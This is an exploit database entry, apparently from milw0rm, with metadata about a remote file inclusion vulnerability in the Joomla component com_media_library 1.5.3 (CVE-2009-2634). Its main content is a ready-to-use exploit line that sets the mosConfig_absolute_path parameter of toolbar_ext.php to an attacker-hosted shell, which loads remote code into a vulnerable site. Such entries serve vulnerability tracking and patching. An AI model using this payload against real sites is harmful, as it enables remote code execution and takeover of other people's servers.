Joomla! Component com_media_library 1.5.3 - Remote File Inclusion
Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2009-06-08
date_updated: 2009-06-09
verified: 1
codes: OSVDB-56648;CVE-2009-2634
tags:
aliases:
screenshot_url:
application_url:
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Joomla com_media_library 1.5.3 Remote File Include
Download: http://ordasoft.com/Download-document/2-MediaLibrary-Basic-1.5.3.html
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: xorontr@gmail.com (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit:
-> .../com_media_library/toolbar_ext.php?mosConfig_absolute_path=shell?
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, VoLkan
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2009-06-09]